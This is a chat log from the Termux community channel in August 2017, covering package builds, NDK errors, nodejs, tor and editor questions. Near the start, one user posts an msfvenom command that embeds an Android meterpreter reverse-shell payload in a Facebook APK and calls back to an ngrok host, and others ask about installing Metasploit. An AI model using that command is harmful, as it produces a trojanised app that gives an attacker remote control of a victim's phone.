2017-08-07 02:09:53 gitter (themastersunil) README.md start.sh ubuntu-fs ubuntu.sh
2017-08-07 02:09:53 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=598804312723db8d5e7f60cf]
2017-08-07 02:52:23 Bqhwcwgwycw #termux
2017-08-07 04:18:16 gitter (Ashish882) /anybudy help
2017-08-07 04:18:56 gitter (Ashish882) $ ./msfvenom -x /sdcard/facebook.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=14481 R >/sdcard/fb1.apk
2017-08-07 04:18:56 gitter (Ashish882) fatal: Not a git repository (or any parent up to mount point /)
2017-08-07 04:18:56 gitter (Ashish882) Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set).
2017-08-07 04:18:56 gitter (Ashish882) [full message: https://gitter.im/termux/termux?at=5988226fc101bc4e3af5a703]
2017-08-07 04:20:39 gitter (Ashish882) @Auxilus @vishalbiswas
2017-08-07 05:08:41 mahabali anybody running metasploit on termux?
2017-08-07 05:10:53 mahabali ahem?
2017-08-07 05:18:22 gitter (TiberiumN) well I don’t
2017-08-07 05:18:24 gitter (TiberiumN) because I have a VPS :)
2017-08-07 05:22:44 mahabali VPS?
2017-08-07 05:23:00 gitter (TiberiumN) virtual private server
2017-08-07 05:23:00 gitter (TiberiumN)
2017-08-07 05:23:02 gitter (TiberiumN) on windows azure
2017-08-07 05:25:25 mahabali nice. so you cant hack on android.
2017-08-07 05:25:50 gitter (TiberiumN) and why do I need it ?
2017-08-07 05:25:54 gitter (TiberiumN) I can just SSH into my VPS :)
2017-08-07 05:25:58 mahabali na. just asking.
2017-08-07 05:26:05 gitter (TiberiumN) well you can
2017-08-07 05:26:08 gitter (TiberiumN) at least with something like
2017-08-07 05:26:17 gitter (TiberiumN) linux deploy
2017-08-07 05:26:17 gitter (TiberiumN) (kali linux/ blackarch)
2017-08-07 05:26:22 frumpylava mahabali: https://wiki.termux.com/wiki/Metasploit
2017-08-07 05:26:47 mahabali im installing it on termux but currently facing a dependency issue.
2017-08-07 05:27:13 mahabali rnacl libsodium is not getting installed.
2017-08-07 05:40:52 live_the_dream k iv added some i686 packages… cargo rustc gcc-7 shortly
2017-08-07 10:15:41 gitter (AshleyNykiel) @themastersunil the command you need to issue is: termux-fix-shebang *.sh
2017-08-07 10:38:12 gitter (Auxilus) How do I use irc in Termux ?
2017-08-07 10:39:07 cottongin Auxilus weechat
2017-08-07 10:39:59 gitter (Auxilus) Ty
2017-08-07 10:41:29 gitter (Auxilus) How do i join termux freenode irc channel?
2017-08-07 10:42:14 cottongin /join #termux
2017-08-07 10:42:42 cottongin assuming you’ve already connected to the freenode network
2017-08-07 10:42:51 gitter (Auxilus) Okay mate, ty
2017-08-07 10:42:58 cottongin np
2017-08-07 10:44:00 gitter (Auxilus) irc: server freenode added
2017-08-07 10:44:00 gitter (Auxilus) │20:13:44 =!= | irc: command “join” must be |
2017-08-07 10:44:00 gitter (Auxilus) │ | executed on irc buffer (server or |
2017-08-07 10:44:00 gitter (Auxilus) │ | channel) |
2017-08-07 10:44:15 gitter (Auxilus) What do I do now?
2017-08-07 10:44:41 cottongin gotta connect first
2017-08-07 10:44:48 cottongin /connect freenode
2017-08-07 10:44:50 gitter (Auxilus) How?
2017-08-07 10:45:34 u0_a96 123 123 test tesr
2017-08-07 10:45:46 gitter (Auxilus) Oo nicee
2017-08-07 10:45:51 gitter (Auxilus) Ok
2017-08-07 10:45:57 gitter (Auxilus) How do i change username?
2017-08-07 10:45:59 cottongin /nick your_desired_nick
2017-08-07 10:46:15 gitter (Auxilus) K
2017-08-07 10:46:52 Auxilus hey @cottongin ty for help man !
2017-08-07 10:46:58 cottongin np Auxilus
2017-08-07 10:47:16 Auxilus you on termux weechat or on web ?
2017-08-07 10:47:39 cottongin weechat but not via termux
2017-08-07 10:47:53 Auxilus kk
2017-08-07 10:48:15 Auxilus exit
2017-08-07 10:48:32 cottongin well, i should say i’m running termux but only to ssh into my VPS which is running weechat
2017-08-07 11:17:17 gitter (Auxilus) Can I run tor relay on termux?
2017-08-07 11:20:31 gitter (AshleyNykiel) Does anyone know if nvim was compiled with lua support?
2017-08-07 11:22:16 gitter (AshleyNykiel) If there’s no lua support could you please compile nvim with lua support an upload it to the termux repo?
2017-08-07 11:27:48 gitter (vishalbiswas) @Auxilus apt install tor
2017-08-07 11:27:59 gitter (Auxilus) Ye but
2017-08-07 11:28:13 gitter (vishalbiswas) @Ashish882 keytool is a java app
2017-08-07 11:28:20 gitter (Auxilus) I think we have to configure torrc
to get it run as relay
2017-08-07 11:28:35 gitter (vishalbiswas) Yes, read official docs then
2017-08-07 11:28:49 gitter (vishalbiswas) There’s a page that explains it
2017-08-07 11:28:49 gitter (Auxilus) Also can i tunnel my apps through tor in termux?
2017-08-07 11:29:05 gitter (Auxilus) Ye @vishalbiswas imma take a look at ‘em
2017-08-07 11:30:01 gitter (Auxilus) Can I?
2017-08-07 11:30:10 gitter (vishalbiswas) @Auxilus ngrok?
2017-08-07 11:30:32 gitter (vishalbiswas) “Tunnel”?
2017-08-07 11:31:09 gitter (Auxilus) Ye like force all the traffic from my device through tor
2017-08-07 11:31:44 gitter (Auxilus) ngrok ye, i think i have to forward the port
2017-08-07 11:43:15 gitter (vishalbiswas) Not possible to route evrything through termux yet
2017-08-07 11:43:46 gitter (Auxilus) Kk
2017-08-07 12:26:12 gitter (mklein994) @fornwall cmark
is at 0.28.0; a really easy fix.
2017-08-07 13:57:41 gitter (fornwall) @mklein994 updating cmark to 0.28.0?
2017-08-07 14:06:08 gitter (Auxilus) Will the termux-styling apk on f-droid work?
2017-08-07 14:06:26 gitter (Auxilus) Also do we have to sign the apk before installation?
2017-08-07 14:06:39 gitter (vishalbiswas) you need same signature on both main app and styling app
2017-08-07 14:06:54 sdrausty It should. Did you download the main app from f-droid?
2017-08-07 14:07:07 gitter (Auxilus) There is pgp signature on fdroid
2017-08-07 14:07:09 gitter (Auxilus) https://f-droid.org/repo/com.termux.styling_17.apk.asc
2017-08-07 14:07:16 gitter (Auxilus) No @sdrausty
2017-08-07 14:07:19 gitter (vishalbiswas) not that
2017-08-07 14:07:25 gitter (Auxilus) I downloaded it from play store
2017-08-07 14:07:30 gitter (vishalbiswas) download both from f-droid
2017-08-07 14:07:36 gitter (Auxilus) Okay
2017-08-07 14:08:02 sdrausty Either f-droid or Gplay. Don’t mix and match.
2017-08-07 14:08:07 gitter (Auxilus) Is there any way to backup my termux data and restore it?
2017-08-07 14:08:26 gitter (Auxilus) Okay @sdrausty ill download both from fdroid
2017-08-07 14:08:58 gitter (vishalbiswas) titanium backup
2017-08-07 14:09:34 gitter (Auxilus) Can i restore it again?
2017-08-07 14:09:42 Entroacceptor hey, I’d like to have something akin to termux-dialog, but instead of giving a password prompt opens up a menu
2017-08-07 14:09:51 sdrausty Use zip @Auxilus
2017-08-07 14:10:05 gitter (Auxilus) K
2017-08-07 14:12:59 gitter (Auxilus) Titanium backup need root
2017-08-07 14:13:16 gitter (vishalbiswas) thought you had it
2017-08-07 14:13:37 gitter (Auxilus) Nay :p
2017-08-07 14:16:05 gitter (pizzapanther) trying to get uwsgi to build with my python app and i get ` ./uwsgi.h:212:10: fatal error: ‘sys/sem.h’ file not found`
2017-08-07 14:16:21 gitter (pizzapanther) anyone know a way to get that installed in the right location?
2017-08-07 14:16:47 gitter (vishalbiswas) sysv semaphores aren’t available in android
2017-08-07 14:18:25 gitter (vishalbiswas) which android version though? it was later supported i think
2017-08-07 14:19:13 gitter (pizzapanther) i’m on a chromebook pixel so i think that is the latest android
2017-08-07 14:20:32 gitter (pizzapanther) ok found it, 6.0.1
2017-08-07 14:20:54 sdrausty @pizzapanther try termux-info
2017-08-07 14:21:27 gitter (pizzapanther) ```
2017-08-07 14:21:27 gitter (pizzapanther) Termux version:
2017-08-07 14:21:27 gitter (pizzapanther) <=0.48
2017-08-07 14:21:27 gitter (pizzapanther) [full message: https://gitter.im/termux/termux?at=5988afa64bcd78af562097f5]
2017-08-07 14:21:30 gitter (Auxilus) I cant install termux downloaded frm fdroid
2017-08-07 14:23:17 gitter (pizzapanther) so am I SOL for now?
2017-08-07 14:23:45 gitter (vishalbiswas) you can try using a sem.h from bionic sources
2017-08-07 14:24:22 gitter (vishalbiswas) do you have linux/sem.h?
2017-08-07 14:24:29 sdrausty https://f-droid.org/packages/com.termux/
2017-08-07 14:24:41 gitter (vishalbiswas) if yes, then that has all the function prototypes
2017-08-07 14:24:45 gitter (pizzapanther) yes found /data/data/com.termux/files/usr/include/linux/sem.h
2017-08-07 14:25:06 gitter (vishalbiswas) then just create a sem.h and include linux/sem.h
2017-08-07 14:25:06 gitter (pizzapanther) if i make a symbolic link maybe it will compile?
2017-08-07 14:25:06 gitter (Auxilus) @vishalbiswas it says failed to installed due to unknown error
2017-08-07 14:25:26 gitter (vishalbiswas) @Auxilus first install termux main app, then styling
2017-08-07 14:25:54 gitter (Auxilus) Ye, main app itself is showing error
2017-08-07 14:26:18 gitter (vishalbiswas) uninstall old one first
2017-08-07 14:26:21 sdrausty Did you uninstall you Gplay version?
2017-08-07 14:26:22 gitter (Auxilus) I did
2017-08-07 14:26:49 sdrausty and any addons?
2017-08-07 14:27:01 gitter (Auxilus) Ooo sry
2017-08-07 14:27:09 gitter (Auxilus) I had api still installed
2017-08-07 14:27:22 gitter (Auxilus) Ty mab
2017-08-07 14:27:26 gitter (Auxilus) Installed now
2017-08-07 14:28:01 sdrausty good
2017-08-07 14:30:06 gitter (vishalbiswas) @pizzapanther but you won’t be able to use them
2017-08-07 14:30:14 gitter (vishalbiswas) ```
2017-08-07 14:30:14 gitter (vishalbiswas) int semctl(int, int, int, …) __INTRODUCED_IN(26);
2017-08-07 14:30:14 gitter (vishalbiswas) int semget(key_t, int, int) __INTRODUCED_IN(26);
2017-08-07 14:30:14 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=5988b1b676a757f80882286f]
2017-08-07 14:30:50 gitter (vishalbiswas) see those __INTRODUCED_IN(26)
2017-08-07 14:31:14 gitter (pizzapanther) actually uwsgi is only for production so i just need to fool into installing the package
2017-08-07 14:31:30 gitter (pizzapanther) i don’t need it to run
2017-08-07 14:32:01 gitter (vishalbiswas) @pizzapanther whatever works then ;)
2017-08-07 14:33:04 sdrausty Can someone try the -j option “specify a jar or zip file containing classes to include” in aapt package? aapt states “Including resources from package:[*.jar]” but is it really including them while packaging?
2017-08-07 14:35:44 sdrausty on device in Termux, please.
2017-08-07 14:40:03 gitter (pizzapanther) @vishalbiswas compiles further but i still get
2017-08-07 14:40:08 gitter (pizzapanther) ```
2017-08-07 14:40:08 gitter (pizzapanther) core/utils.c:295:15: error: use of undeclared identifier ‘caps’
2017-08-07 14:40:08 gitter (pizzapanther) cap_set_flag(caps, CAP_PERMITTED, 4, minimal_cap_values, CAP_SET);
2017-08-07 14:40:08 gitter (pizzapanther) ```
2017-08-07 14:43:42 gitter (Auxilus) What is .shortcuts?
2017-08-07 14:45:54 rods-tab3 for termux widgets
2017-08-07 16:04:36 gitter (mklein994) @fornwall yeah; I can’t update myself right now; but from what I can tell, there isn’t any crazy changes from 0.27.1. I only know that it’s updated because it was in Arch Linux.
2017-08-07 16:12:50 gitter (fornwall) @mklein994 thanks, it’s updated now!
2017-08-07 17:55:45 icebal Anyone try to automate termux with Automate?
2017-08-07 18:21:20 live_the_dream ghostscript doesn’t compile on x86 s6uff Grimler … nothing to do with your headers its thr configure process
2017-08-07 20:06:30 – CTCP requested by BeansnRice: PING 1502150785 270851
2017-08-07 20:06:30 – CTCP reply to BeansnRice: PING 1502150785 270851
2017-08-07 21:52:28 gitter (vishalbiswas) @pizzapanther I’ll try to compile it myself. You are trying with python, right?
2017-08-07 23:57:51 aleph- Anybody using ruby? Trying to get nokogiri to compile correctly in termux.
2017-08-08 01:29:47 BenL90 hello i wanted to ask.I use termux a lot,but I couldn’t find any hotkey to switch between terminal on termux. Is there anyway to work on it?
2017-08-08 01:30:05 BenL90 thanks.
2017-08-08 01:38:15 BenL90 hello
2017-08-08 01:38:20 BenL90 anyone?
2017-08-08 01:44:07 rods-tab3 the help file lists the hotkeys
2017-08-08 02:00:47 vishalbiswas aleph there are multiple issues regarding nokogiri at termux-packages repo
2017-08-08 02:20:19 Grimler live_the_dream: Hm, I thought I tried compiling it for all arches. What was the error, did you fix it?
2017-08-08 02:21:13 live_the_dream it says i5 can’t find -ljpeg
2017-08-08 02:21:13 live_the_dream its because its x86 compiling for x86 etc
2017-08-08 02:21:29 live_the_dream same thing occured with nodejs 8
2017-08-08 02:22:28 live_the_dream hmmm trying to get brand new llvm fortran compiler working…
2017-08-08 02:23:48 Grimler ah, so we need libjpeg for x86 installed?
2017-08-08 02:24:15 live_the_dream i wish fornwall would talk to me about nodejs since i got newer versions working.
2017-08-08 02:25:16 live_the_dream yeah
2017-08-08 02:27:36 live_the_dream and libexpat-dev
2017-08-08 02:28:19 live_the_dream @fornwall … ?
2017-08-08 02:34:52 vishalbiswas live_the_dream: did it also fix all those awful permissiin error?
2017-08-08 02:49:51 live_the_dream ?
2017-08-08 03:05:05 gitter (themastersunil) apt install proot
2017-08-08 03:05:05 gitter (themastersunil) Reading package lists… Done
2017-08-08 03:05:05 gitter (themastersunil) Building dependency tree
2017-08-08 03:05:05 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=598962a0c101bc4e3afa4d6c]
2017-08-08 03:05:29 gitter (themastersunil) Please anyone fix it????
2017-08-08 03:25:53 vishalbiswas live_the_dream: try creating an ionic tutorial project in home dir. you’ll get permission denied /data/data
2017-08-08 04:31:21 gitter (vishalbiswas) ```gdb
2017-08-08 04:31:21 gitter (vishalbiswas) 2017-08-08T14:00:46.067+0530 I CONTROL [main]
2017-08-08 04:31:21 gitter (vishalbiswas) 2017-08-08T14:00:46.067+0530 W CONTROL [main] 32-bit servers don’t have journaling enabled by default. Please use –journal if you want durability.
2017-08-08 04:31:21 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=598976d91c8697534a9a59c3]
2017-08-08 05:16:05 live_the_dream sounds like there is a path that is just assumed …
2017-08-08 05:16:23 fornwall live_the_dream: sorry, been away! I’m ready to talk nodejs and libexpat-dev now :)
2017-08-08 05:17:07 live_the_dream yeah so i came up with the idea of preventing the local build gcc getting bad cross compile args
2017-08-08 05:17:13 live_the_dream so im building consistently
2017-08-08 05:17:23 live_the_dream but that is the first part
2017-08-08 05:18:13 fornwall for the nodejs build of mkpeephole?
2017-08-08 05:18:19 live_the_dream yeah
2017-08-08 05:18:27 live_the_dream nodejs-current
2017-08-08 05:19:20 live_the_dream so basically script calls gcc instead of gcc directly and removes -I/data/data/com.termux/files/usr/include and -L$PREFIX/lib
2017-08-08 05:20:10 live_the_dream so setting up build env is a tad finicky
2017-08-08 05:20:10 live_the_dream ..
2017-08-08 05:21:39 fornwall right, it’s a bit messy with nodejs/v8 builds the mkpeephole part
2017-08-08 05:21:47 fornwall perhaps it would be enough to patch the file
2017-08-08 05:21:48 fornwall out/deps/v8/src/mkpeephole.host.mk
2017-08-08 05:21:52 fornwall which is generated after configure
2017-08-08 05:24:13 live_the_dream that is the thing though … its totally designed without cross compiling in mind
2017-08-08 05:24:26 live_the_dream so there is no consistency with how things are handled
2017-08-08 05:28:17 live_the_dream yeah but iv got it built
2017-08-08 05:29:18 live_the_dream so even though what i am doing is a large cluster fuck of a hack
2017-08-08 05:29:18 live_the_dream im actually running it on all 4 archs
2017-08-08 05:32:44 fornwall nice! so building for 32-bit arm and i686 requires installing some 32-bit development packages?
2017-08-08 05:34:24 live_the_dream yeah
2017-08-08 05:34:24 live_the_dream it demands cross compiling 32 bith with 32 bit
2017-08-08 05:34:24 * live_the_dream shrugs
2017-08-08 05:34:28 live_the_dream it also assumes the same c++ lib used in both tool chains
2017-08-08 05:34:31 live_the_dream …
2017-08-08 05:35:24 live_the_dream you can start to notice how little faith i have right?
2017-08-08 05:35:26 live_the_dream sometimes you can bug fix … sometimes the correct fix is preventing a whole catagory of bugs
2017-08-08 05:36:32 live_the_dream but anyway within docker image you have to install multilib
2017-08-08 05:57:54 fornwall what do you think about https://goo.gl/6aDsQC ?
2017-08-08 05:59:21 fornwall seems to build under the docker image for aarch64 and x86_64 now, and should hopefully build for 32-bit arm and i686 after installing multilib, I’ll try it out
2017-08-08 06:09:47 fornwall what was it about libexpat-dev?
2017-08-08 06:15:19 gitter (vishalbiswas) fornwall: with latest ndk update
2017-08-08 06:15:19 gitter (vishalbiswas) ```
2017-08-08 06:15:19 gitter (vishalbiswas) /home/vishal/.termux-build/_lib/15.2-arm-21-v11/bin/../lib/gcc/arm-linux-androideabi/4.9.x/../../../../include/c++/4.9.x/cstdio:137:9: error: no member named ‘fgetpos’ in the global namespace
2017-08-08 06:15:19 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=59898f36ee5c9a4c5f9eefbb]
2017-08-08 06:17:07 gitter (fornwall) @vishalbiswas I pushed a fix for that an hour ago, try pulling in the latest git master and try again!
2017-08-08 06:20:19 live_the_dream for ghostcript
2017-08-08 06:20:45 gitter (vishalbiswas) @fornwall cannot find that commit, are you sure?
2017-08-08 06:20:45 gitter (vishalbiswas)
2017-08-08 06:21:09 live_the_dream its compiling for arm and aarch64 not x86 studf
2017-08-08 06:21:57 gitter (fornwall) @vishalbiswas it should be this one: https://github.com/termux/termux-packages/commit/e7f446519ceb17afdce50ed12182a8cbcc789cd5 - does it not work?
2017-08-08 06:34:06 gitter (vishalbiswas) @fornwall still getting that error
2017-08-08 06:34:28 fornwall live_the_dream: libexpat/ghostscript fails for x86?
2017-08-08 06:35:23 live_the_dream ghostcript can’t find libjpeg and then can’t find libexpat…
2017-08-08 06:39:07 gitter (fornwall) @vishalbiswas hm, strange
2017-08-08 06:39:19 gitter (vishalbiswas) boost builds
2017-08-08 06:39:40 gitter (vishalbiswas) but this error comes up when including /data/data/com.termux/files/usr/include/boost/filesystem/operations.hpp
2017-08-08 06:40:28 gitter (vishalbiswas) mongodb configuration is failing when including this file
2017-08-08 06:41:25 gitter (vishalbiswas) Exact scons config.log:
2017-08-08 06:41:25 gitter (vishalbiswas) ```
2017-08-08 06:41:25 gitter (vishalbiswas) scons: Configure: Checking for C++ header file boost/filesystem/operations.hpp…
2017-08-08 06:41:25 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=59899554c101bc4e3afb12e6]
2017-08-08 06:45:45 gitter (fornwall) hm, and /data/data/com.termux/files/usr/include/boost/filesystem/operations.hpp
is the patched file now, which should no longer define __USE_FILE_OFFSET64
?
2017-08-08 06:46:29 gitter (vishalbiswas) that is it then
2017-08-08 06:47:02 gitter (vishalbiswas) I have -DTERMUX_EXPOSE_FILE_OFFSET64
2017-08-08 06:47:02 gitter (vishalbiswas)
2017-08-08 06:47:10 gitter (fornwall) aha
2017-08-08 06:47:47 gitter (vishalbiswas) why is it removed though?
2017-08-08 06:48:19 gitter (vishalbiswas) isn’t there any other way around it?
2017-08-08 06:48:22 gitter (fornwall) starting from ndk r15c, the headers no longer define fsetpos/fgetpos and other functions, if trying to use __USE_FILE_OFFSET64 and building against an api earlier than android-24
2017-08-08 06:48:22 gitter (fornwall) see https://github.com/android-ndk/ndk/issues/442
2017-08-08 06:48:48 gitter (fornwall) the problem is that the libc function fsetpos does not expect a 64-bit off_t on 32-bit android
2017-08-08 06:49:07 gitter (fornwall) and a 64-bit version, fsetpos64, is only available starting from android-24
2017-08-08 06:49:20 gitter (fornwall) do mongodb require 64-bit off_t?
2017-08-08 06:49:39 gitter (vishalbiswas) yup
2017-08-08 06:50:23 gitter (fornwall) as stated in the ndk issue, ndk r15 started exposing fsetpos when 64-bit off_t were used, which would cause runtime failures (the calling code would use 64-bit off_t, but the libc function is built expecting a 32-bit value)
2017-08-08 06:51:12 gitter (fornwall) you could check if setting TERMUX_PKG_API_LEVEL=24
works for mongodb
2017-08-08 06:51:27 gitter (fornwall) (it makes the built package require android-24, but at least it’s a start
2017-08-08 06:51:53 gitter (vishalbiswas) but how to we deliver such packages to appropriate devices
2017-08-08 06:53:05 gitter (fornwall) that’s a problem, currently it would install on all devices, but probably not startup due to missing functions in libc. I think the best way would be to expose the required api level in a custom field in the .deb control file
2017-08-08 06:53:59 gitter (fornwall) and then write an apt hook which validates that the device api level is sufficient to install the package, or shows a descriptive error message instead
2017-08-08 06:54:16 gitter (vishalbiswas) or we can have subrepos for each platform
2017-08-08 06:55:03 gitter (vishalbiswas) main repo works on all, subrepos for api and above
2017-08-08 06:55:04 gitter (fornwall) ah, that’s an easier setup
2017-08-08 06:56:07 gitter (fornwall) does setting TERMUX_PKG_API_LEVEL=24
fix the mongodb build? it’s not very tested as it’s not used for any package yet
2017-08-08 06:59:50 gitter (vishalbiswas) I’m not using that just yet. no device that I own is 24
2017-08-08 07:01:59 live_the_dream vishalbiswas you run virtual box?
2017-08-08 07:02:33 gitter (vishalbiswas) yes/no
2017-08-08 07:02:50 live_the_dream im currently using kvm x86 and 86_64 android
2017-08-08 07:03:01 live_the_dream try it
2017-08-08 07:03:33 gitter (vishalbiswas) my desktop has a particular problem with large image files, deadlocks even when installing from sdkmanager
2017-08-08 07:03:52 live_the_dream should be fast as well
2017-08-08 07:04:41 gitter (pizzapanther) @vishalbiswas got the uwsgi to compile further but some of the build scripts are set to //sh
2017-08-08 07:04:44 gitter (pizzapanther) bin
2017-08-08 07:04:52 live_the_dream im tempted to setup a server and make you login to a termux shell account
2017-08-08 07:04:54 gitter (vishalbiswas) the real reason that I don’t do that is I want to create packages that I can run on my daily device
2017-08-08 07:05:06 live_the_dream i know
2017-08-08 07:05:18 gitter (pizzapanther) /bin/sh
2017-08-08 07:05:51 gitter (vishalbiswas) @pizzapanther you need to disable libcap in uwsgi
2017-08-08 07:05:53 live_the_dream but dev stuff is faster
2017-08-08 07:06:23 gitter (pizzapanther) I could probably get it to work but it’s becoming too much work to pip install stuff
2017-08-08 07:06:38 gitter (pizzapanther) So I’m going to try a chroot
2017-08-08 07:06:52 gitter (pizzapanther) Those work on termux?
2017-08-08 07:07:50 gitter (vishalbiswas) there are a few options, https://github.com/Neo-Oli?tab=repositories
2017-08-08 07:10:39 gitter (pizzapanther) Good to know, I’ll try it today
2017-08-08 07:11:42 gitter (pizzapanther) Since everyone hard codes /bin/sh and /bin/bash it gets annoying
2017-08-08 07:12:18 gitter (vishalbiswas) termux-chroot
from proot
2017-08-08 07:29:55 gitter (fornwall) I’ve just pushed support for setting TERMUX_PKG_BUILD_DEPENDS="pkg1, pkg2"
, for build-time dependencies
2017-08-08 07:31:18 live_the_dream ool
2017-08-08 07:47:03 BenL90_ hello
2017-08-08 07:47:05 BenL90_ test
2017-08-08 07:47:09 BenL90_ errr…
2017-08-08 07:47:55 gitter (vishalbiswas) BenL90: we are receiving you
2017-08-08 08:34:34 gitter (suryapoo) Hey guys
2017-08-08 08:35:05 gitter (suryapoo) When we write exec() command,we execute kernel call…right?
2017-08-08 08:35:41 gitter (suryapoo) So if i do that in a c program in termux..it will call Android’s kernel?
2017-08-08 08:49:42 iheartlinux found this today. lovin’ it
2017-08-08 09:18:12 Grimler I updated the docker image to the latest one and now I’m unable to run perl (in the image), I get “bash: /usr/bin/perl: cannot execute binary file: Exec format error”. Have I somehow broken something or is it an error in the docker image?
2017-08-08 11:16:08 Grimler Docker seem to work now after I deleted image+container and downloaded again
2017-08-08 12:25:46 gitter (Auxilus) @vishalbiswas, if we use newest version to clone Metasploit everytime, new gems are being added as dependencies, which are showing errors while installing
2017-08-08 12:26:28 gitter (Auxilus) I’m getting errors for rbnacl-libsodium -v’1.0.11’
2017-08-08 12:27:06 gitter (Auxilus) ```
2017-08-08 12:27:06 gitter (Auxilus)
2017-08-08 12:27:06 gitter (Auxilus) ```
2017-08-08 12:27:15 gitter (Auxilus) ```localhost: ~ gem install rbnacl-libsodium -v’1.0.11’
2017-08-08 12:27:15 gitter (Auxilus) Building native extensions. This could take a while…
2017-08-08 12:27:15 gitter (Auxilus) ERROR: Error installing rbnacl-libsodium:
2017-08-08 12:27:15 gitter (Auxilus) [full message: https://gitter.im/termux/termux?at=5989e663329651f46effb53f]
2017-08-08 13:49:20 gitter (vishalbiswas) apt install libsodium-dev
2017-08-08 14:18:32 Regenaxer Concerning the vim issue yesterday: The shift-left problems disappear if I comment the lines ‘map
2017-08-08 14:18:57 Regenaxer No idea where they come from. They are not in the Debian version
2017-08-08 14:19:23 Regenaxer And I don’t see how they affect the ‘<’ family of commands in vim
2017-08-08 14:19:57 Regenaxer But now vim is usable again :)
2017-08-08 14:24:40 u0_a166 could you add #define fgetpos fgetpos64 in files that need it?
2017-08-08 14:25:56 u0_a166 as part of a before-build script maybe
2017-08-08 16:20:12 gitter (Grimler91) I have a porting question!
2017-08-08 16:24:14 u0_a166 what is your question. someone who knows might see it in the chatlog later
2017-08-08 16:24:28 gitter (Grimler91) I gave clisp another try and managed to almost get it working this time. It actually almost works to compile and build on device with gcc-7 from pointless’s repo. (I used env CC=gcc-7 ac_cv_func_mmap=no ../configure CFLAGS=”-DNO_GENERATIONAL_GC -landroid-support”). It then generates a binary file (lisp.run) that unfortunately segment faults with some reference to some mapping error or something. Anyways, I googled arround and som
2017-08-08 16:24:28 gitter try to debug it with valgrind, when I run the command that previously failed inside valgrind, I get no segmentation fault. Is this expected? What
2017-08-08 16:24:38 gitter (Grimler91) What does valgrind actually do?
2017-08-08 16:24:52 gitter (Grimler91) u0_a166 yeah let’s hope so :)
2017-08-08 16:25:51 u0_a166 i tried to build clisp one time and got about that far via other means
2017-08-08 16:26:51 u0_a166 + i think the lisp.run image needs too much stack memory. didn’t have root to ulimit high enough
2017-08-08 16:27:40 u0_a166 let’s try again!
2017-08-08 16:32:33 gitter (Grimler91) yeah, I got an error that said that first (“Cannot map memory to address 0x4000000000000 .
2017-08-08 16:32:33 gitter (Grimler91) [src/spvw_mmap.d:353] errno = ENOMEM: Not enough memory.”) ac_cv_func_mmap=no took care of that (maybe, at least compilation went further). Please do!
2017-08-08 16:33:46 gitter (Grimler91) compilation of interpreted.mem worked when running with valgrind in front it seems
2017-08-08 16:34:57 gitter (Grimler91) but it gave quite some errors to the log file:
2017-08-08 16:35:05 gitter (Grimler91) le Edit Options Buffers Tools Help
2017-08-08 16:35:05 gitter (Grimler91) ==11695== Memcheck, a memory error detector
2017-08-08 16:35:05 gitter (Grimler91) ==11695== Copyright (C) 2002-2017, and GNU GPL’d, by Julian Seward et al.
2017-08-08 16:35:05 gitter (Grimler91) [full message: https://gitter.im/termux/termux?at=598a2077329651f46e00b358]
2017-08-08 16:50:37 gitter (Grimler91) Oh, right, and I compiled libsigsegv before, there’s an arm binary available here: https://github.com/Grimler91/Grimler91.github.io/tree/master/files/dists/testing/clisp/binary-arm
2017-08-08 22:33:57 gitter (Auxilus) Still the error @vishalbiswas
2017-08-09 00:04:43 gitter (themastersunil) How can i install java in termux?
2017-08-09 01:26:10 live_the_dream for now you can’t @themastersunil
2017-08-09 01:27:10 rods-tab3 why not ?
2017-08-09 03:19:13 poyntz can termux be run through adb? if i type bash it drops to bash prompt but I get access denied errors on every command
2017-08-09 03:22:12 poyntz also is there any way to open apks using termux? E.g, ‘open -a Sublime\ Text
2017-08-09 03:55:36 rods-tab3 $ termux-open –help
2017-08-09 03:55:37 rods-tab3 Usage: termux-open [options] path-or-url
2017-08-09 03:55:37 rods-tab3 Open a file or URL in an external app.
2017-08-09 03:55:37 rods-tab3 –send if the file should be shared for sending
2017-08-09 03:55:37 rods-tab3 –view if the file should be shared for viewing (default)
2017-08-09 03:55:37 rods-tab3 –chooser if an app chooser should always be shown
2017-08-09 03:55:37 rods-tab3 –content-type type specify the content type to use
2017-08-09 11:26:18 gitter (pizzapanther) just fyi @vishalbiswas using the chroot helps alot because at least I can make a symlink to /bin/
and ‘/usr/bin` then most install scripts stop complaining
2017-08-09 11:27:30 gitter (pizzapanther) now i just need to figure out how to get the heroku-cli installed
2017-08-09 12:34:00 gitter (pizzapanther) so if i use nvm or n to install a different version node i get ./node: No such file or directory
2017-08-09 12:34:12 gitter (pizzapanther) the file is clearly there so what gives?
2017-08-09 12:34:56 gitter (pizzapanther) i’m on the pixel with i686 so i’ve been using the 32bit version
2017-08-09 12:35:08 gitter (pizzapanther) do i need to do the arm version?
2017-08-09 13:42:18 gitter (vishalbiswas) @pizzapanther Node cannot be easily installed in termux like that. the nodejs package inbthe repo is heavily modified to work in termux
2017-08-09 13:45:26 gitter (Thatguy1114) Is it possible to set up torch in termux?
2017-08-09 14:31:38 gitter (pizzapanther) @vishalbiswas i need node version 8.1.4 to get heroku-cli to work, so how is it possible to get other versions on?
2017-08-09 16:22:56 ishmael hello
2017-08-09 16:23:52 ishmael Has any one been able to get nvm [node version manager] up and running?
2017-08-09 19:53:42 gitter (fornwall) @pizzapanther there is now a nodejs-current
package available, currently at version 8.2.1
2017-08-09 20:47:47 voldo hello world
2017-08-09 22:18:54 poyntz hi. is there any way to open a text file in QuickEdit Pro using termux?
2017-08-09 22:19:06 poyntz ie., com.rhmsoft.edit.pro
2017-08-09 22:20:44 poyntz e.g, termux-
2017-08-09 22:29:34 poyntz if not it’d be a great feature. currently have to use vi / vim to edit text and it’s super slow but in their defence they seem to handle default syntax highlighting for just about every file which is awesome.
2017-08-09 22:29:39 live_the_dream fornwall: going to try and get flang working today …
2017-08-09 22:30:51 live_the_dream xdg-open text and make quickedit pro handle it?
2017-08-09 22:34:16 poyntz live_the_dream: tried that - it comes up with chooser (to open .bashrc) which gives me 3 selections, “Nova Launcher” (desktop launcher), “Zarchiver” (zip utility), and “Stocard” (member cards)
2017-08-09 22:35:03 live_the_dream fair enough
